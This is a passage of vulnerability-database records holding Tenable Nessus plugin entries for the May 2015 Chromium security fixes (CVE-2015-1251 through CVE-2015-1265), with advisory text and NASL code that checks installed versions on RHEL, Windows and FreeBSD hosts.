"cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T15:05:51", "description": "Updated chromium-browser packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash or, potentially, execute arbitrary code with the privileges of the user running Chromium. (CVE-2015-1251, CVE-2015-1252, CVE-2015-1253, CVE-2015-1254, CVE-2015-1255, CVE-2015-1256, CVE-2015-1257, CVE-2015-1258, CVE-2015-1259, CVE-2015-1260, CVE-2015-1261, CVE-2015-1262, CVE-2015-1263, CVE-2015-1264, CVE-2015-1265)\n\nAll Chromium users should upgrade to these updated packages, which contain Chromium version 43.0.2357.65, which corrects these issues.\nAfter installing the update, Chromium must be restarted for the changes to take effect.", "cvss3": {}, "published": "2015-05-26T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2015:1023)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2021-02-05T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:6.6", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo"], "id": "REDHAT-RHSA-2015-1023.NASL", "href": "https://www.tenable.com/plugins/nessus/83808", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1023. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83808);\n script_version(\"2.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\", \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\", \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1261\", \"CVE-2015-1262\", \"CVE-2015-1263\", \"CVE-2015-1264\", \"CVE-2015-1265\");\n script_bugtraq_id(74723, 74727);\n script_xref(name:\"RHSA\", value:\"2015:1023\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2015:1023)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated chromium-browser packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Chromium to crash\nor, potentially, execute arbitrary code with the privileges of the\nuser running Chromium. (CVE-2015-1251, CVE-2015-1252, CVE-2015-1253,\nCVE-2015-1254, CVE-2015-1255, CVE-2015-1256, CVE-2015-1257,\nCVE-2015-1258, CVE-2015-1259, CVE-2015-1260, CVE-2015-1261,\nCVE-2015-1262, CVE-2015-1263, CVE-2015-1264, CVE-2015-1265)\n\nAll Chromium users should upgrade to these updated packages, which\ncontain Chromium version 43.0.2357.65, which corrects these issues.\nAfter installing the update, Chromium must be restarted for the\nchanges to take effect.\"\n );\n # https://googlechromereleases.blogspot.com/2015/05/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://chromereleases.googleblog.com/2015/05/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1260\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1261\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1262\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1263\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1264\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1265\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1251\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1252\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1255\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1254\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1257\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1256\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1259\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1258\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1023\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-43.0.2357.65-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-43.0.2357.65-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-43.0.2357.65-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-43.0.2357.65-1.el6_6\", allowmaj:TRUE)) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T15:06:32", "description": "The version of Google Chrome installed on the remote Windows host is prior to 43.0.2357.65. It is, therefore, affected by multiple vulnerabilities :\n\n - A Use-after-free memory error exists in the SpeechRecognitionClient implementation that allows remote attackers, using a crafted document, to execute arbitrary code. (CVE-2015-1251)\n\n - The Write() and DoWrite() methods of the class PartialCircularBuffer do not properly handle wraps.\n A remote attacker, by using write operations with a large amount of data, can exploit this to bypass the sandbox protection or cause a denial of service.\n (CVE-2015-1252)\n\n - The DOM implementation in Blink does not properly handle SCRIPT elements during adjustment of DOM node locations. A remote attacker, using crafted JavaScript code that appends a child to a SCRIPT element, can exploit this flaw to bypass the same origin policy.\n (CVE-2015-1253)\n\n - The 'core/dom/Document.cpp' in Blink enables the inheritance of the 'designMode' attribute. A remote attacker, using a crafted web page, can utilize this to bypass the same origin policy via the availability of editing. (CVE-2015-1254)\n\n - A use-after-free memory error exists in the WebAudio implementation when handling the stop action for an audio track. A remote attacker can exploit this to cause a denial of service or possibly execute arbitrary code. (CVE-2015-1255)\n\n - A use-after-free memory error exists in the SVG implementation in Blink, related to the improper handling of a shadow tree for a use element. A remote attacker, using a crafted document, can exploit this to cause a denial of service or possibly execute arbitrary code. (CVE-2015-1256)\n\n - The SVG implementation in Blink does not properly handle an insufficient number of values in an feColorMatrix filter. A remote attacker, using a crafted document, can exploit this to cause a denial of service via a container overflow. (CVE-2015-1257)\n\n - The libvpx library code was not compiled with an appropriate '--size-limit' value. This allows a remote attacker, using a crafted frame size in VP9 video data, to trigger a negative value for a size field, thus causing a denial of service or possibly having other impact. (CVE-2015-1258)\n\n - Google PDFium does not properly initialize memory. A remote attacker can exploit this to cause a denial of service or possibly have other unspecified impact.\n (CVE-2015-1259)\n\n - Multiple use-after-free memory errors exist the WebRTC implementation. A remote attacker can exploit these, by using a crafted JavaScript code that executes upon completion of a getUserMedia request, to cause a denial of service or possibly have other unspecified impact.\n (CVE-2015-1260)\n\n - The file 'HarfBuzzShaper.cpp' in Blink does not properly initialize a certain width field. A remote attacker, using crafted Unicode text, can exploit this to cause a denial of service or have other unspecified impact.\n (CVE-2015-1262)\n\n - The Spellcheck API implementation does not use an HTTPS session for downloading a Hunspell dictionary. A man-in-the-middle attacker, using a crafted file, can exploit this flaw to deliver incorrect spelling suggestions or possibly have other unspecified impact.\n (CVE-2015-1263)\n\n - A cross-site scripting (XSS) vulnerability exists that is related to the Bookmarks feature. A remote attacker, using crafted data, can exploit this to inject arbitrary web script or HTML. (CVE-2015-1264)\n\n - Multiple unspecified vulnerabilities exist that allow an attacker to cause a denial of service or possibly have other impact via unknown vectors. (CVE-2015-1265)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2015-05-21T00:00:00", "type": "nessus", "title": "Google Chrome < 43.0.2357.65 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_43_0_2357_65.NASL", "href": "https://www.tenable.com/plugins/nessus/83745", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83745);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2015-1251\",\n \"CVE-2015-1252\",\n \"CVE-2015-1253\",\n \"CVE-2015-1254\",\n \"CVE-2015-1255\",\n \"CVE-2015-1256\",\n \"CVE-2015-1257\",\n \"CVE-2015-1258\",\n \"CVE-2015-1259\",\n \"CVE-2015-1260\",\n \"CVE-2015-1262\",\n \"CVE-2015-1263\",\n \"CVE-2015-1264\",\n \"CVE-2015-1265\"\n );\n script_bugtraq_id(74723, 74727);\n\n script_name(english:\"Google Chrome < 43.0.2357.65 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 43.0.2357.65. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A Use-after-free memory error exists in the\n SpeechRecognitionClient implementation that allows\n remote attackers, using a crafted document, to execute\n arbitrary code. (CVE-2015-1251)\n\n - The Write() and DoWrite() methods of the class\n PartialCircularBuffer do not properly handle wraps.\n A remote attacker, by using write operations with a\n large amount of data, can exploit this to bypass the\n sandbox protection or cause a denial of service.\n (CVE-2015-1252)\n\n - The DOM implementation in Blink does not properly\n handle SCRIPT elements during adjustment of DOM node\n locations. A remote attacker, using crafted JavaScript\n code that appends a child to a SCRIPT element, can\n exploit this flaw to bypass the same origin policy.\n (CVE-2015-1253)\n\n - The 'core/dom/Document.cpp' in Blink enables the\n inheritance of the 'designMode' attribute. A remote\n attacker, using a crafted web page, can utilize this to\n bypass the same origin policy via the availability of\n editing. (CVE-2015-1254)\n\n - A use-after-free memory error exists in the WebAudio\n implementation when handling the stop action for an\n audio track. A remote attacker can exploit this to\n cause a denial of service or possibly execute\n arbitrary code. (CVE-2015-1255)\n\n - A use-after-free memory error exists in the SVG\n implementation in Blink, related to the improper\n handling of a shadow tree for a use element. A remote\n attacker, using a crafted document, can exploit this\n to cause a denial of service or possibly execute\n arbitrary code. (CVE-2015-1256)\n\n - The SVG implementation in Blink does not properly handle\n an insufficient number of values in an feColorMatrix\n filter. A remote attacker, using a crafted document, can\n exploit this to cause a denial of service via a\n container overflow. (CVE-2015-1257)\n\n - The libvpx library code was not compiled with an\n appropriate '--size-limit' value. This allows a remote\n attacker, using a crafted frame size in VP9 video data,\n to trigger a negative value for a size field, thus\n causing a denial of service or possibly having other\n impact. (CVE-2015-1258)\n\n - Google PDFium does not properly initialize memory. A\n remote attacker can exploit this to cause a denial of\n service or possibly have other unspecified impact.\n (CVE-2015-1259)\n\n - Multiple use-after-free memory errors exist the WebRTC\n implementation. A remote attacker can exploit these, by\n using a crafted JavaScript code that executes upon\n completion of a getUserMedia request, to cause a denial\n of service or possibly have other unspecified impact.\n (CVE-2015-1260)\n\n - The file 'HarfBuzzShaper.cpp' in Blink does not properly\n initialize a certain width field. A remote attacker,\n using crafted Unicode text, can exploit this to cause a\n denial of service or have other unspecified impact.\n (CVE-2015-1262)\n\n - The Spellcheck API implementation does not use an HTTPS\n session for downloading a Hunspell dictionary. A\n man-in-the-middle attacker, using a crafted file, can\n exploit this flaw to deliver incorrect spelling\n suggestions or possibly have other unspecified impact.\n (CVE-2015-1263)\n\n - A cross-site scripting (XSS) vulnerability exists that\n is related to the Bookmarks feature. A remote attacker,\n using crafted data, can exploit this to inject arbitrary\n web script or HTML. (CVE-2015-1264)\n\n - Multiple unspecified vulnerabilities exist that allow an\n attacker to cause a denial of service or possibly have\n other impact via unknown vectors. (CVE-2015-1265)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2015/05/stable-channel-update_19.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9eefd81\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 43.0.2357.65 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-1265\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'43.0.2357.65', severity:SECURITY_HOLE, xss:TRUE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T15:06:20", "description": "Google Chrome Releases reports :\n\n37 security fixes in this release, including :\n\n- [474029] High CVE-2015-1252: Sandbox escape in Chrome. Credit to anonymous.\n\n- [464552] High CVE-2015-1253: Cross-origin bypass in DOM. Credit to anonymous.\n\n- [444927] High CVE-2015-1254: Cross-origin bypass in Editing. Credit to armin@rawsec.net.\n\n- [473253] High CVE-2015-1255: Use-after-free in WebAudio. Credit to Khalil Zhani.\n\n- [478549] High CVE-2015-1256: Use-after-free in SVG. Credit to Atte Kettunen of OUSPG.\n\n- [481015] High CVE-2015-1251: Use-after-free in Speech. Credit to SkyLined working with HP's Zero Day Initiative.\n\n- [468519] Medium CVE-2015-1257: Container-overflow in SVG. Credit to miaubiz.\n\n- [450939] Medium CVE-2015-1258: Negative-size parameter in libvpx.\nCredit to cloudfuzzer\n\n- [468167] Medium CVE-2015-1259: Uninitialized value in PDFium. Credit to Atte Kettunen of OUSPG\n\n- [474370] Medium CVE-2015-1260: Use-after-free in WebRTC. Credit to Khalil Zhani.\n\n- [466351] Medium CVE-2015-1261: URL bar spoofing. Credit to Juho Nurminen.\n\n- [476647] Medium CVE-2015-1262: Uninitialized value in Blink. Credit to miaubiz.\n\n- [479162] Low CVE-2015-1263: Insecure download of spellcheck dictionary. Credit to Mike Ruddy.\n\n- [481015] Low CVE-2015-1264: Cross-site scripting in bookmarks.\nCredit to K0r3Ph1L.\n\n- [489518] CVE-2015-1265: Various fixes from internal audits, fuzzing and other initiatives.\n\n- Multiple vulnerabilities in V8 fixed at the tip of the 4.3 branch (currently 4.3.61.21).", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (a9d456b4-fe4c-11e4-ad15-00262d5ed8ee)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:chromium", "p-cpe:/a:freebsd:freebsd:chromium-npapi", "p-cpe:/a:freebsd:freebsd:chromium-pulse"], "id": "FREEBSD_PKG_A9D456B4FE4C11E4AD1500262D5ED8EE.NASL", "href": "https://www.tenable.com/plugins/nessus/83556", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83556);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\", \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\", \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1261\", \"CVE-2015-1262\", \"CVE-2015-1263\", \"CVE-2015-1264\", \"CVE-2015-1265\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (a9d456b4-fe4c-11e4-ad15-00262d5ed8ee)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Google Chrome Releases reports :\n\n37 security fixes in this release, including :\n\n- [474029] High CVE-2015-1252: Sandbox escape in Chrome. Credit to\nanonymous.\n\n- [464552] High CVE-2015-1253: Cross-origin bypass in DOM. Credit to\nanonymous.\n\n- [444927] High CVE-2015-1254: Cross-origin bypass in Editing. Credit\nto armin@rawsec.net.\n\n- [473253] High CVE-2015-1255: Use-after-free in WebAudio. Credit to\nKhalil Zhani.\n\n- [478549] High CVE-2015-1256: Use-after-free in SVG. Credit to Atte\nKettunen of OUSPG.\n\n- [481015] High CVE-2015-1251: Use-after-free in Speech. Credit to\nSkyLined working with HP's Zero Day Initiative.\n\n- [468519] Medium CVE-2015-1257: Container-overflow in SVG. Credit to\nmiaubiz.\n\n- [450939] Medium CVE-2015-1258: Negative-size parameter in libvpx.\nCredit to cloudfuzzer\n\n- [468167] Medium CVE-2015-1259: Uninitialized value in PDFium. Credit\nto Atte Kettunen of OUSPG\n\n- [474370] Medium CVE-2015-1260: Use-after-free in WebRTC. Credit to\nKhalil Zhani.\n\n- [466351] Medium CVE-2015-1261: URL bar spoofing. Credit to Juho\nNurminen.\n\n- [476647] Medium CVE-2015-1262: Uninitialized value in Blink. Credit\nto miaubiz.\n\n- [479162] Low CVE-2015-1263: Insecure download of spellcheck\ndictionary. Credit to Mike Ruddy.\n\n- [481015] Low CVE-2015-1264: Cross-site scripting in bookmarks.\nCredit to K0r3Ph1L.\n\n- [489518] CVE-2015-1265: Various fixes from internal audits, fuzzing\nand other initiatives.\n\n- Multiple vulnerabilities in V8 fixed at the tip of the 4.3 branch\n(currently 4.3.61.21).\"\n );\n # http://googlechromereleases.blogspot.nl/2015/05/stable-channel-update_19.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?73e36afd\"\n );\n # https://vuxml.freebsd.org/freebsd/a9d456b4-fe4c-11e4-ad15-00262d5ed8ee.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7182e7bf\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-npapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-pulse\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<43.0.2357.65\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-npapi<43.0.2357.65\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-pulse<43.0.2357.65\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T15:05:54", "description": "Several vulnerabilities were discovered in the chromium web browser.\n\n - CVE-2015-1251 SkyLined discovered a use-after-free issue in speech recognition.\n\n - CVE-2015-1252 An out-of-bounds write issue was discovered that could be used to escape from the sandbox.\n\n - CVE-2015-1253 A cross-origin bypass issue was discovered in the DOM parser.\n\n - CVE-2015-1254 A cross-origin bypass issue was discovered in the DOM editing feature.\n\n - 